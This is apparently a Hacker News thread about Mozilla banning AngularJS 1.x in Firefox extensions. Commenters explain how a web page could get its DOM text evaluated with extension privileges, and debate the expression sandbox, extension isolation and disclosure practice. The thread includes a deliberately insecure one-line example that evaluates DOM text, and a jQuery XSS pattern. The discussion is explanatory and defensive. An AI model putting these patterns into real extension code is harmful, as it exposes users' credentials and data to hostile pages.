Many commenters here seem to be completely misunderstanding the situation.
Browser extensions are really dangerous; if you need to keep your machine secure, you shouldn't use any IMHO. By definition, browser extensions need to be able to access things such as page content. What would stop someone from writing a extension that captures your bank credentials? Nothing.
Obviously no security-conscious user is going to install a bank credential stealing extension. But what about bugs in extensions? If a buggy extension can be made to execute arbitrary code, it is as dangerous as a malicious extension (if the arbitrary code execution works in the same circumstances).
Angular 1.x basically runs eval on DOM content. That's how it works, it's not a vulnerability in normal use. You make a web page using Angular, and possibly the user has a way to eval arbitrary JS code through Angular, but then they have the developer console so they can run arbitrary code anyway.
With browser extensions it's different. The extension is from one source and runs with one set of privileges, and the page comes from someone else and has less privileges. Now if anything from the page can be eval'd in the extension, that's privilege escalation. Someone creating a site can run malicious content as a browser extension.
It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
Angular wasn't designed for browser extensions.
WRT the security researcher and Mozilla not disclosing other known sandbox vulnerabilities, that's missing the point (but an interesting discussion in itself).
> It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
AngularJS runs expressions that are in your page's HTML when it initializes (or when you explicitly call angular.bootstrap on an element), but only on the page where it is loaded. If an extension uses Angular within the extension, that's perfectly fine, security wise. Unless the developer explicitly requests it, pages visited cannot move code into an extension's context (which would be dangerous in any case, Angular or not).
Even when the developer explicitly moves data from a web page into the extension context, this does not cause a security issue, even when the data ends up in the DOM. Once loaded, Angular does not revisit the DOM to run expressions in it (otherwise all Angular pages would be compromised). Care has to be taken when using things like ng-bind-html, but the security profile for an extension is the same as a regular web page here. With Angular's $sce service and automatic escaping/sanitizing, it's actually reasonably easy to write safe web applications that properly escape user input.
All of this is unrelated to the expression sandbox. The sandbox was never intended to be a security feature, but rather a feature to keep developers from shooting into their own foot (e.g. by creating global variables). It was considered to be defense-in-depth mechanism for a while, but it turns out it is at best misleading for users who believe it protects them. That is why we removed it.
Thanks for the reply. I mistook the sandbox to be related to $sce. It's been a while since I last coded Angular.
So you're saying that Mozilla is mistaken in their decision, and the only way for page content to be eval'd with extension privileges is if the developer was careless with ng-bind-html or $compile?
Yes, Angular itself is fine, and there's no problem with escaping or eval'ing per se.
However there is a corner condition in which Angular being present in an extension might weaken some security measures. It requires multiple issues to happen together, including the victim page being vulnerable in the first place. I'm actually not sure if that is the issue that Mozilla was thinking about, but it is a problem. We will put some defense in depth into Angular to mitigate this, but I believe it's a general issue with how extensions are handled, not limited to Angular.
Sorry for being a bit vague, but no patch has been released yet.
> The sandbox was never intended to be a security feature, but rather a feature to keep developers from shooting into their own foot (e.g. by creating global variables). It was considered to be defense-in-depth mechanism for a while, but it turns out it is at best misleading for users who believe it protects them. That is why we removed it.
For apps using Angular 1.5, do any changes need to be made to move up to Angular 1.6 without the sandbox? Does Angular lose any features with the removal of the sandbox?
> By definition, browser extensions need to be able to access things such as page content. What would stop someone from writing a extension that captures your bank credentials? Nothing.
Completely agreed. This is why it's so frustrating that all of the browser vendors have moved to this, "gut every minor option/feature possible, people can just get an extension" attitude.
For Firefox:
* removing the option to not maintain download history
* removing the option for the compact drop-down menu from the URL bar
* forcing tabs on top
* forcing refresh button to the right-hand side of the interface
For Chrome:
* removing backspace navigation (you may dislike it, but others don't)
* disabling middle-click to scroll on Linux
* removing the option to set your new tab page (eg to about:blank)
* not letting you prevent HTML5 video autoplay
* not letting you disable WebRTC
Just the backspace extension alone requires basically carte blanche access to everything just to be able to insert a tiny Javascript function to catch the keypress.
I'm not asking for us to go back to the Mozilla suite with integrated mail client, news reader, etc. Just ... it's okay to have an "advanced options" section that lets us control some of this really simple, really basic stuff. And not only okay, a major security benefit to do so. All the focus on web security, you'd think they'd take this stuff more seriously.
They could at least make it possible choosing not to upgrade a very simple extension which we may have been personally reviewed.
I want a fixed (read: no updates) extension that does this: On key press, check if the key is backspace, when it is, check if any form element is focused, when not, go back. One line of JS, I guess three with nice formatting. If I create this, I need to submit it to the Chrome Store so Chrome won't complain about untrusted extensions.
Of course they also removed the ability to tell it that I know what I'm doing.
I agree but unfortunately it's not a very popular design pattern these days.
Because of this I basically have no applications installed on my android smartphone since even trivial applications often end up requiring ridiculous amounts of privileges (often for relatively minor features) and of course there's no way to fine tune what you allow and what you don't.
Honestly I think that's a terrible habit to give your users, just ignore the privilege list since there's nothing you can do about it and click "sure whatever".
Devs should have to justify why the app needs the feature and I should be able to disable it if it's not critical for the application to work correctly. It would make it a bit harder to write and test those apps but it's not like it's rocket science either...
Sidenote: It is pretty much exactly the Googles (alas, auto-updated) "Go Back With Backspace" [0] does: [1] (you forgot the shift backspace, Google as well in past versions).
> It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
Sandboxing in JS should be possible these days. Spin up an iframe, add the sandboxing attribute, load javascript into it, postMessage the code you want to execute to it, await the return value. voila, you executed untrusted code in an isolated origin context.
You can't run code that depends on variables in the page context though. If all the input values are serializable, then you can postMessage them into the iframe too, but you can't serialize objects with arbitrary methods, etc. The code you run in the sandbox can't return back a rich object with arbitrary methods because that has to get serialized back out. You can't use getters and setters to transparently proxy all accesses because postMessage is asynchronous. Even if you restrict everything to only dealing with objects with promise-returning functions, I'm not entirely sure if you can get this all to play nicely with garbage collection (say you have an object outside of the iframe which is only referenced -- through the proxy system -- by an object inside the iframe which is only referenced by that object outside of the iframe)...
Iframe-sandboxing is far from a drop-in solution to this type of problem into an existing codebase.
Access to arbitrary methods would go against the idea of sandboxing anyway. If something references the global object for example you suddenly would have access to a privileged fetch API or other extension APIs.
Maybe if you use a WeakMap with a transferrable object and assuming that if you postMessage a transferrable object and then get it back later and still have the WeakMap recognize it as a key. I'm not very sure that last part would work. I don't think GC-links reach through iframes in a way that would enable that.
WeakMaps are more limited than most people seem to expect. They're powerful tools that enable many new powerful patterns, but they don't expose the workings of the garbage collector. They're very different from Java's WeakHashMap for example. In Javascript, the only way you can tell whether the browser is using a garbage collector or not is to try to run out of memory. Without crashing, there's no way for some Javascript code to observe the runtime's GC behavior at all by design.
Object identity is not preserved with Transferring or regular structured cloning. Transferring is really about the resource represented it held onto by the object being transferred.
If object identity (for the purpose of WeakMap) was preserved, your idea would provide a way to observe GC behavior. Which wouldn't automatically be a complete disaster, though I am personally dead set against it except maybe in some sort of privileged context. Weak references keep getting proposed, and there are some pretty compelling use cases, but there is also some very major risk that we could never back out of once weakrefs were available, and they could permanently hold back future GC performance. (You could easily break deployed web applications by improving GC behavior.)
(Source: I implemented Transferring in general and Transferring ArrayBuffers in particular in Spidermonkey, and I work on the GC engine. And it's nice to see a comment on HN like the parent that gets it right for once!)
But the issue of preventing arbitrary Javascript code from running based on user input isn't limited to Angular, it's a problem since the beginning of time!
What about Angular is so special that it needs to be blacklisted? It will likely still be safer than ad-hoc client-side templating that people will do instead.
> By definition, browser extensions need to be able to access things such as page content.
On Firefox/XUL maybe. Web Extensions (like in Chrome) work much like Android apps: You need to acknowledge their desired permissions up front. They can’t request more later.
Of course you may need these permissions to create your extension.
The vulnerability described by op applies to chrome just the same. Once the addon has `pageCapture` permission, an angular 1 exploit would work just the same.
Many extensions have full access to all webpages, also in chrome; there's no sandbox or anything similar safely separating extension from page. That's not a bug or missing feature: it's by design! Many extensions fiddle with all kinds of page aspects as part of their core functionality.
An adblocker that can't inspect the page dom would likely not work very well.
BROWSERS are really dangerous; if you need to keep your machine secure, you shouldn't use any IMHO. By definition, browsers need to be able to access things such as page content. What would stop someone from writing a browser that captures your bank credentials? Nothing.
Obviously no security-conscious user is going to install a bank credential stealing browser. But what about bugs in browsers? If a buggy browser can be made to execute arbitrary code, it is as dangerous as a malicious browser...
At the end, it's a matter of trust in your browser or your extensions.
I see where you're getting at, but with only a handful of browsers* maintained by large organisations eager to protect their reputations vs a plathora of extensions out there, your argument doesn't hold so well.
* I'm assuming usage of Chrome/IE/Firefox/Safari here.
The quoted paragraph is buildup to the fact that AngularJS evals content on purpose, and does not really even try to be secure against maliciously-crafted DOM. Browsers, on the other hand, are designed to resist attacks.
But yes, certainly you need to trust the browser more than an extension.
Note that the Angular team is working with Mozilla and the researcher on this (see https://github.com/mozilla/addons-linter/issues/1000#issueco...) and that NDAs are a real, if insane, thing still to this day, and there is literally no way to legally compel any party to admit to being under NDA except in a court of law.
Should the researcher have told the Angular team? Yes. Should they have told the entire world? Probably no. Should Mozilla tell the world? Probably even less no. As long as the parties are talking (which they are), this is an unfinished security review on lock-down to prevent exploitation in the interrim.
Also, let's not inundate the page with extraneous comments unless we're already part of one of the projects involved. We all have strong opinions, and the HN post has been linked in the issue, so the devs can come here to see discussion if they want it.
Let's be good GH citizens. :-) Nobody benefits from the Issue ending up locked because the discussion got too off-topic.
The mentioned vulnerability was most likely another sandbox escape. The sandbox is described as "not a defense mechanism" by the Angular team, and the sandbox was removed entirely in the 1.6 release[0]. They admit that Angular isn't secure for cases where an attacker can control the template: this case includes extensions! I'm not going to fault someone for not reporting a security issue with an already-removed feature specifically described as not a security feature.
Before anyone misreads this: the sandbox being removed in 1.6 doesn't mean that Angular 1.6 is safe to use in extensions. It just means that Angular stopped pretending it was safe there. A fundamental part of Angular is evaling text from the DOM. If the DOM is controlled by an attacker, such as a webpage trying to elevate to extension privileges, then you're out of luck. Sandboxing eval is a very large and difficult task that would bloat Angular, all for a use-case that they are not interested in. Angular 1.x is the wrong tool for the job.
NDAs are a real, if insane, thing still to this day
Some of the big security bugs recently have been disclosed to big players like Google and AWS before they were publicly disclosed.
If you want to retain that privilege, you need to show you can keep your mouth shut when security researchers disclose something to you - NDA or otherwise.
When you release a patch, anyone who gets it can see what you changed and figure out an exploit from that. Because it's good for people to be patched /before/ that happens, some vendors give certain major customers early access to patches - so long as they maintain a proven track record of not disclosing anything about them.
For example, Xen has a 'pre-disclosure list' [1] so if they have a critical security patch, Amazon, Google, Linode, Oracle, Rackspace, and several Linux distro developers [2] get the patches early.
Obviously, we can debate the morality and wisdom of this policy - personally as I haven't discovered any critical security bugs, I've never faced this particular moral conundrum.
Because big players can take remedial action prior to the bug being disclosed to protect users - for example, banning a specific framework from browser extensions.
This "vulnerability" is harder to exploit in Chrome because extensions in Chrome (unlike in Firefox) have their own private DOM, and settings page have isolated DOM too. If an extension uses Angular only with its private DOM there is no vulnerability.
The vulnerability can be exploited only if an extension is running Angular on an untrusted page which is less likely in Chrome (but of course one should not underestimate the level of incompetency of a modern frontend developer).
UPD: @bzbarsky noted that Firefox is using the same security model as Chrome so both browser extensions can be vulnerable. To exploit a vulnerability, several conditions should be met: 1) extension should inject Angular into a web page 2) attacker should be able to find a way to get from content script context into extension's background page context.
Note that the github discussion is about Firefox webextensions, which have the same security model as Chrome extensions (and in fact aim to be API-compatible with Chrome extensions).
Chrome has many many extensions which run on and modify the page DOM just like Firefox! I think it might even be reasonable to guess that around half of extensions do this.
Modifying DOM is not enough to cause a vulnerability. In Chrome content scripts (the ones that are injected into a page from an extension) have limited privileges though there still can be the ways to exploit them.
Chrome content scripts can have permissions to make AJAX requests to any origin. Sure, it's not a straight-ticket to getting code native execution and installing malware on your machine, but it means an exploit against an extension with wide enough permissions could harvest your email and bank info.
It's completely expected to both inject scripts into a pages DOM, and also to set up a communication channel back from the page content script to the central extension "process". It's not a rare corner case. An ad-blocking content script might want to report user-selected extra filter requests back to the main adblocker context; or it may simply want to count the number of blocked requests; or a password manager may want the ability to save new passwords; etc.
Typically, you'd expect the central extension to trust messages it receives from its own content scripts, so even though there is a separation between the extension and the pages it's on, the separation is by no means a leak-proof security measure; it cannot be. You rely on each and every such extension being carefully written and having no security relevant bugs.
If you think about it, it should be clear that it's practically infeasible to fix this hole. Extensions authors simply need to avoid such bugs. If angular1 somehow makes it easy for them to make mistakes when used by an extension, that's a problem.
Don't update your post to include replies to your own comment. Hackernews already allows us to see the replies. If you have a response to a comment, reply to that comment.
Chrome extensions are less of an issue though, no? IIRC Firefox addons are significantly more powerful than Chrome extensions, so locking things down tighter makes sense anyway, a low threat on Chrome could be much higher on FF.
If a Chrome extension has permissions to an origin, then it can freely make cross-domain requests to it from any page. So if you have an extension using Angular 1.x on every page and then browse to a malicious page, then the page could contain text in the DOM that Angular evals from within the extension. That code could then make an AJAX request to any origin with your cookies, and make requests for your bank info or emails and do things like steal data or change your passwords.
The discussion here is about Firefox webextensions, which use the Chrome extension API and are not supposed to be more powerful than Chrome extensions.
It's possible to write Firefox extensions in JavaScript that are a lot more powerful than Chrome extensions (or webextensions, which are the Firefox equivalent of Chrome extensions) are. That capability is slowly being phased out, though.
No, historical XPI addons are in JS (and XML and CSS). While they can bundle native code most don't, but they run in at the same privilege level as the browser itself (consider Firebug, which was and still is an addon).
So, there's so many problems with this i don't know where to begin. Since folks have already noted the "not notifying google" issue, let me point out another:
Prior to banning, i can find literally no discussion or details about this being about to happen (IE no notice), pretty much ever.
I can find no discussion around it (maybe it's there but i'm missing it? I looked in a lot of places).
You can see it fixed an issue to "warn third party developers of things we banned/don't advise", but there's nothing about initially banning anything there, and it was added with an initial ban list containing angular. I would have expected a page added, then a ban discussed, then a ban added. or something.
This seems really bad. I would have expected, at the very least, a heads up to extension developers or something or even a more public notice when it happened so that some discussion could be had about it.
Instead, it looks like the only way you would have found out about it is by trying to lint an extension and see it banned
(IE after you developed it), or somehow random browsing of doc pages mozilla has.
> Instead, it looks like the only way you would have found out about it is by trying to lint an extension and see it banned (IE after you developed it)
It's one of the big dangers of a "walled garden": you are subject to the whims of the arbiter.
Google has repeatedly been equally abrupt in making breaking changes to other people's apps/products/pages/sites to resolve security problems. I'm glad they do, and I'm glad Mozilla isn't fucking around with stuff like this either.
1. Just because one guy is an idiot does not mean the other should be.
2. You know, you may want to tell people and establish a process for telling people that this is happening (ie it should not take until person files github issue asking what's up when they validate their app to know what's going to be okay and not)
(and if the answer is "google doesn't do that", see #1 :P)
Sorry, yes, that was crass, and i apologize. I can't edit it, sadly, anymore.
I meant it really in the sense that: You have given no reason this couldn't have been done in a fashion that provided the barest minimum of notice or information. Doing so when you can do so is the right thing, and if someone else is not doing that, that does not mean you should duplicate that process.
As far as i know, nobody has claimed otherwise, here or there.
In fact, there are a number of factual inaccuracies that seem to have been driving parts of this decision (IE "google has stopped supporting angular 1") that a trivial notice and discussion process probably would have corrected.
Past that nothing in this discussion has pointed to anything so urgent (especially given the 6+ month time period involved between the original presentation and any notice at all it was banned, and then another 6 months till now) that it required immediate action at the point they did it.
If there was something, again, someone could have, at the very least, said that ("Hey, we discovered a problem, we're going to take immediate action, this may hurt. Sorry").
TL;DR I'm a fan of Ready, aim, fire, not fire, ready, aim.
If it can't be done that way, fine, but no data says that this was the case here.
Sorry, I thought I had written a longer comment but got distracted, so that came out sharper than I meant.
I agree. Notice is good. But all sorts of pressures interfere with notice, like embargoes, multiple stakeholders, threat intelligence, IR and active exploitation, and so on.
The important thing is to close the vulnerability. Everything else is distantly secondary.
Also, and respectfully: it is not so much Mozilla's job to know the maintenance status of Google Javascript libraries so much as it is Google's responsibility not to ship Javascript code (or extensions) that make Mozilla insecure.
Using big external libraries in Firefox add-ons used to be totally prohibited. Jquery used to be prohibited outright. It's an undesirable practice. Add-ons operate at a higher privilege level than web pages. The low-quality webcrap that can be tolerated on a web page has no place in a privileged add-on.
Really it doesn't matter if it's for display purposes or not. It all boils down to implementation. I can make a view library riddled with XSS vulns in very little time.
It's possible that the vulnerability only effects Angular running in Firefox addons, and not the general web. Mozilla takes an aggressive stance on what they allow in vetted browser extensions, as they should.
JS in addons runs in a different, more privileged environment than normal web pages, and isn't restricted by things like same-origin (although this is improving with Firefox's new extension APIs). Any project the size of Angular is bound to have security issues when run outside of the environment it was designed for.
No, the vulnerability specifically has to do with Angular within extensions. Angular trusts the page DOM and uses eval-like functions on code within it. This is relatively fine if the DOM isn't controlled by someone else, but in cases where the DOM is controlled by someone with less permissions (ie. Angular is running in a higher-privilege extension, and the DOM is controlled by some webpage), then then an attacker can elevate their permissions by writing code into the DOM and letting Angular execute it within the extension.
Don't extensions have their own DOM (like they have in Chrome)? Why would anyone run Angular on a browser page? It would probably conflict with existing application.
It looks like Firefox extension architecture has design problems.
And I don't like the presentation. One could think that Angular is vulnerable which is not true. The vulnerability appears when it is used in a wrong way in a browser extension.
This is an issue with extensions that run code on webpage DOM. It's very popular for extensions to modify webpages. Chrome supports extensions like this too. I might even guess that more than half of extensions do this.
>Why would anyone run Angular on a browser page? It would probably conflict with existing application.
Adding additional widgets or tools directly within an existing webpage is a common thing for extensions to do. And if you're adding a lot of UI, you might want to use an existing UI library like you would on a normal webpage instead of doing all the DOM by hand. Not all UI libraries work out well for this apparently.
Because you want to manipulate its DOM and Angular is what you're familiar with?
> It would probably conflict with existing application
Note that it would operate on the same _DOM_ but not in the same scripting environment. That is, if you have a DOM element "foo" that comes from the web page, then doing:
foo.somePropNameIMadeUp = 5;
will set a property that is not visible to the web page, while doing:
foo.setAttribute("id", "myId");
or:
foo.id = "myId";
will modify the DOM in a way the web page can see.
So the risk is that an add-on would inject angular 1.x into an external web site, this web site being malicious, it modifies its own DOM, so that angular would eval expressions from this DOM within the scripting environment running at a higher privilege.
What if the malicious web site does something like <script src="resource://dumb-addon/angular.min.js"></script> ? On Firefox, i verified this loads angular into the web site, but what about the privilege level ? Will it be the original one from the page or higher ?
As a side note, doing the Chrome equivalent <script src="chrome-extension://dumb-addon/angular.min.js"></script>, the loading fails with an exception saying "chrome-extension://" is not an allowed source.
In my extension, i modified the angular.min.js file to insert this as the first line:
Basically, it throws an exception if the library is not loaded from a local "resource://" page (hopefully considered as safe since it is part of the add-on code). I verified this prevented loading angular using the <script src="resource://..."> trick or if angular was inadvertently injected using a Firefox frame-script (nsIFrameScriptLoader.loadFrameScript) and add-on sdk/page-mod or sdk/content/worker modules.
Can we consider it is safe to use angular 1.x only from local add-on panels to run the user interface ?
> What if the malicious web site does something like <script src
That will run with the website's privileges. Just like site A loading a script from site B will run it with site A's privileges.
> the loading fails with an exception saying "chrome-extension://" is not an allowed source.
Chrome extensions (and webextensions) have a way to flag particular files as "web-exposed". Ones that are not can't be loaded via the web.
Firefox has something similar for chrome:// URIs in non-webextensions, but resource:// allows loads from the web in certain contexts, which include <script> elements.
> Can we consider it is safe to use angular 1.x only from local add-on panels to run the user interface ?
I don't know the details of what the security issues reported on angular 1.x are, so I can't claim that it's safe or not safe. But at first blush, as long as angular is only interacting with the addon's own DOM, and the addon DOM never injects any text from a page DOM into itself, it _seems_ like it should be safe.
The presentation is fantastic. It proves beyond a doubt that Angular is vulnerable in the context that it claims to offer a security feature that is manifestly insecure. And I mean, they're evaling JS code in the template engine, this shouldn't be a surprise. To be clear, Angular from its inception claimed to offer "safe" templating. So this is a big deal.
Browser extensions in all browsers typically do things to the web page DOM for various reasons. I don't know how the technical details work since I've never written one, but chrome addons can certainly change things about the web page DOM.
Not necessarily. JS in addons has to run in a more privileged environment to interact with the browser. However, that makes it possible to write insecure addons. In this case, Angular 1.x might contain the insecure code.
For example: arbitrary user input from a web page is passed to the addon. Angular handles it, and does "eval-like things"[0] with it. Now the attacker is running arbitrary code in a privileged environment.
[0] eval-like things is a core part of how Angular works. So the vulnerability doesn't necessarily apply to Angular 1.x in a normal web page. But it wasn't designed to be run with higher privileges.
Every browsers addon runtime is different. Firefox is working on standardizing things with it's Web Extensions API (modeled after Chromium's API). But potentially, yes.
They still see the same content in the DOM. The extension just has a separate javascript-wrapper around the DOM. This means that an extension will not be affected if a webpage monkey-patches a DOM method to do something else. But if a webpage places some specific text content inside an HTML element, then the extension will see that same text content! (And Angular running in the extension can still choose to recognize that content as a template and eval it.)
You can find same kind of "vulnerability" in jQuery:
$(element).html(user input);
This will evaluate scripts in "user input". Does this mean jQuery is vulnerable? No, it just means you are doing something wrong with it.
UPD: I was wrong, jQuery inserts a script tag into DOM instead of directly calling eval() so the code above is not equivalent to eval and is another type of vulnerability.
It will evaluate scripts with the permissions of the element being manipulated. Which in a normal webpage is the same thing as the script doing the manipulating, which means you have XSS, which is bad, yes.
In the context of an extension manipulating a web page, though, the jQuery thing you quote will evaluate the script with the permissions of the web page, not the permissions of the extension. On the other hand, doing eval() with a string from the web page will evaluate things with the permission of the extension.
So there is a pretty subtle (and irrelevant in web pages!) but important distinction between the two kinds of script injection here. In a web page they are more or less equivalent in terms of leading to XSS if you have untrusted input. But in an extension, the jQuery one is OK if your input comes from the web page itself, and the eval() version is not.
[Disclaimer: I work for Mozilla, but not on extension policy.]
No, that's the facile assumption to enable finger-pointing. My money is on an interaction between two legitimate design choices when considered independently.
Firefox wasn't designed to run Angular in an extension on webpage DOM. Angular wasn't designed to run in Firefox extensions on webpage DOM. Nether has a vulnerability, when used as designed.
It's not safe for a 3 year old to drive a car, even if there's nothing wrong with the baby or the car.
The vulnerability specifically has to do with Angular being used in extensions where the extension has more privileges than the webpage it's affecting. Judging by http://www.slideshare.net/x00mario/an-abusive-relationship-w..., the issue has to do with a general design feature of Angular: it runs eval-like functions on text within the page DOM. Angular simply isn't built for the page DOM is controlled by an attacker (ie. Angular is running in a higher-privilege extension, and the webpage controls the DOM and wants to inject code into the higher-privilege extension). Angular has band-aids over a few specific ways that this can be taken advantage of, but it's extremely difficult to make bullet-proof (as blacklisting strategies often are) and it's not an issue that affects regular non-extension web pages.
This "vulnerability" can be only exploited in specific cases when Angular is used in an unintended way - for example, injected in a web page from extension context in Firefox (which is wrong anyway because it would conflict with scripts on the page).
I tried to understand whether the same is possible in Chrome - injected scripts there have less privileges and use some form of isolation - but the manual [1] doesn't give a clear answer. The injected (and exploited) content script has lower privileges than an extension but has some API methods not available to scripts on a page. For example it can send messages to an extension and it could be exploited too.
But generally Chrome extension architecture provides more isolation and looks more secure especially when extensions are written by not very experienced developers.
I was writing about problem in general, not relatively to the Firefox extensions. Someone may name that not a vulnerability, but Angular v1 makes it very easy to shoot yourself in your foot doing string based values evaluating as expressions.
Imagine a case when some front-end developer gets JSON data from the remote data source by REST, having no idea about data source origin. Then for example there is a need to apply $watch for some fields of the received JSON object. Lets assume some of the fields contain JS code (for now it would be a sandbox bypassing snippet, but since v1.6 seems it can be plain JS with no obfuscations). As a result XSS happens. They would better disable string based expressions evaluating for the listed methods https://docs.angularjs.org/guide/security and allow only passing function as an argument, then it would be clear for developers that data sanitizing is up to developer and it's supposed to be implemented in the custom functions. But design issue would still exist.
Chrome extensions running in webpages share the DOM with the webpage. That's how they make modifications to the webpage.
They have their own javascript-wrappers around the DOM, so an extension is not vulnerable to a webpage overwriting DOM methods, but obviously the DOM still has the same content visible in it, and this can't protect extensions from using libraries which eval content within the DOM.
On the contrary - they reacted removing sandbox completely giving up handling sandbox bypassing snippets, the problem is in the design of the framework and it can't be just fixed.
Not true. Google has diverged development of Angular 1 and 2. Angular 1 was initially developed with designers in mind, but it caught on with developers. They developed Angular 2 with developers in mind. Angular 2 is different from 1 in many respects. I don't see Google dropping Angular 1 support anytime soon.
The explanation is in the issue thread now. If you have Angular running in an extension, if it sees Angular tags in the page you're viewing, it could execute them with the elevated permissions of the extension instead of the permissions of the page.
Bitwarden is a password manager? And their engineer is asking, after being told a hint of serious security issues in their framework, to just forget about it and let them publish?
No, the engineer is asking for more information so that he can determine if the application is truly affected by some unpublished Angular vulnerability or if Mozilla is just being too aggressive with their ban hammer because someone said "Angular 1.x was no longer being officially supported", which is false.
Followed up immediately with "Are all parts of Angular affected?" The charitable interpretation is that he is asking "is there a safe subset of Angular that we can use instead of a blanket ban?".
Yeah that's a fair (and more charitable) way to read that. But it's also not that clear. He spends a lot of time worrying about how much time they've spent on their extension.
Why no "woah, our other angular apps could be affected, is there any safe subset of angular 1?"
There aren't many products where security matters THAT much. I'd hope that the people working on password managers have a total security first mindset.
If you're the engineer in question (since your comment history suggests you work at Bitwarden), you should explicitly state that and explain that ignoring any vulnerability was not the intent of your comment.
It's good you updated the Github comment, but you should also consider explicitly stating your affiliation when relevant when commenting on Hacker News in the future.
If you had done in this case, it would have immediately cleared up encoderer's questions about your Github comment.
It's not doing much for your reputation (or that of your employer) that you still haven't clarified whether you are the engineer or not - even after deliberately referring to yourself in the third person and being called out for it.
"We banned any package containing Angular 1.x. We received a security report. One that we were asked not to share with you, one that we didn't even mention, we just went ahead and implemented the ban, didn't tell anybody."
The expression sandbox was not secure (and would be extremely difficult and heavily bloat the size of Angular to secure) and was not intended to be secure. It only blacklisted specific known attacks. As your link says, they removed it because people kept thinking it was a security feature they could rely on.
Angular runs eval on the page DOM. This isn't secure when the page DOM is controlled by an attacker (such as a webpage trying to elevate into an extension's privileges). Angular 1.x is the wrong tool to use within page extensions.
Correct, now it should be clear for all that Angular v1 is dangerous thing by design and it should not be used at all. Most likely a lot of not very experienced developers do for example $watch on value provided by the user input and that's a 100% XSS vulnerability since $watch does evaluate value if that was a string. And $watch is just a one example, there is a list of methods that do expressions evaluation.
I guess extension's privileges means more privileges than a regular web page has (accessing file system for example?), if so then it's even more dramatic.
Right. Extensions have more privileges than normal web pages.
For the specific case here (webextensions), the extension asks for a list of permissions at install time, so which privileges it has, exactly, depends on the extension. https://developer.chrome.com/extensions/declare_permissions has documentation on what the various permissions you can request are.
It is not dangerous. The vulnerability appears when incompetent developer injects Angular into a web page from a browser extension in Firefox (I don't know whether it would work in other browsers because they have other extension architecture).
Ugh, this kind of thing gets my blood boiling. It was clearly said that _a security researcher_ disallowed Mozilla from reporting the vulnerability forward. It's the individual to blame, not Mozilla.
In any case Personally I wouldn't want to run a large priviledged application as a browser extension when it's interacting with random webpages AND handling my security credentials. Too much attack surface.
The issue with Angular in extensions has to do with the fact it uses eval on the page DOM, which is controlled by the webpage. The webpage can put code into the DOM, and then let Angular execute it from within the higher-privileged extension.
Angular <1.6 had a sandbox feature which blacklisted specific attacks like this, but was not a general solution and was specifically not intended as a security feature. They entirely removed the sandbox in 1.6 because people kept thinking it was a security feature: http://angularjs.blogspot.com/2016/09/angular-16-expression-...
I'm not going to fault someone for not reporting a specific vulnerability with a specifically not-security feature that has already been removed.
Curious, do you use a password wallet/manager application, and if so how do you get passwords out of it and into the browser? I'd like to know if there's a better solution. (I use a browser extension.)
There were a few high profile ones recently reported by Tavis, but there have been many in the past, and it looks like no brand of password manager has consistently written safe browser extensions. They're written to be slick-looking and convenient, the actual security isn't visible enough to be a sales/popularity boost so it suffers. This very story/issue is another example in the making.
Was recently at an angular conference -- they said they would continue to support it until the _majority_ of the community had made the switch. That's so far from happening, I imagine they'll be supporting it for years.
based on that statement and others my read is basically:
We know a lot of important people and they gave us information you don't have, to which we have made business decisions that affect you that we didn't communicate. Did we tell you? no. Now that you know, are we going to elaborate? nope. trust us, our people on the inside will be proven correct soon enough, so you can thank us later.
I'm not sure if this is the same case, but I assume it is: if you're wondering why the researcher doesn't want to share the vuln listen to this talk:
https://www.youtube.com/watch?v=U4e0Remq1WQ
Roughly at 41:30 he explains why he doesn't want to disclose the vuln. The tl;dr is he thinks the sandbox is broken beyond repair and whatever fix they come up he can create another bypass for the sandbox. But he doesn't want to do this all the time and he needs his vuln as a poc to show to customers if they abuse the sandbox.
That doesn't make much sense. If there's a vulnerability in Angular, doesn't it mean that there's a vulnerability in the JS engine that runs the Firefox addons? And in that case, can't an attacker replicates whatever Angular is doing to make an exploit? Basically it sounds like it's something for Mozilla to fix, not the Angular team.
Angular runs eval-like functions on HTML in the DOM. The DOM can be controlled by the webpage. When Angular runs in an extension (which has more permissions than the page) using the DOM controlled by the webpage, then the webpage can write code into the DOM that Angular executes from within the extension's security context. It's not the browser's fault that Angular trusts the webpage's DOM like that; Angular just isn't built for extensions.
Yes, but in a browser extension context the web page controls the HTML involved and is the thing you want to defend against. So relying on the HTML to play nice is not OK.
Exactly. If you can write a vulnerability in Angular, you can write it in vanilla Javascript as well. Unless Angular is using `eval()` or something and Firefox bans any use of `eval()`, which is reasonable...
Which it is, as far as I can see, though it tried to make it slightly safer ... until version 1.6, when it gave up on pretending it's at all safe. The linked slide share from the github issue talks about this a bit. See http://www.slideshare.net/x00mario/an-abusive-relationship-w... slides 16-31 which talk about the sandbox angular tried to apply to the environment it did the eval() in, but in the end it's grabbing text from the DOM and doing an eval().
Note that in a browser extension doing text from the DOM (controlled by the web page) and doing an eval (with the privileges of the extension!) is obviously really really bad.
[Disclaimer: I work for Mozilla and I'm not an expert on Angular.]
Firefox Addons Marketplace reviews and bans malicious and insecure extensions. There are legitimate uses of eval. Angular's use of eval (on DOM content) is insecure within the context of browser extensions.
Yes, you can write vulnerable code in plain javascript:
eval(document.querySelector('.foo').textContent);
In a regular web page where you don't allow the user to insert arbitrary HTML, it's a perfectly fine line allowing you to store code in the DOM.
If you do that in a browser extension where the DOM is controlled by the web page, then you've got a big security vulnerability: the webpage can put anything it wants into a foo tag and then your extension will execute it with its privileges! Your extension will be taken down from the Firefox Addons Marketplace if it's reviewed and this line is found running. If lots of extensions added this line, then Mozilla would probably automate blocking extensions from containing it.
Angular 1.x does something like this line. It's perfectly fine in web pages where you control the DOM, but is insecure if the DOM comes from an untrusted outsider!
I had an extension a while ago that I was attempting to publish to the Firefox app store and it was rejected on grounds of using eval. I don't remember why I needed to use eval, but basically this is something they do already. I'm guessing that previously they were allowing for an Angular exception.
Lots of perfectly sensible JavaScript code uses eval for things like feature detection and runtime code generation. If you removed eval they'd just use 'new Function' instead, which has most of the same problems.
I have no information one way or the other, but maybe the issue isn't that angular can do it, but that angular does do it. So any extension using angular is vulnerable by default.
I read that and said a literal WTF. How is it at all acceptable to honor such a request? What possible good reason could there be?
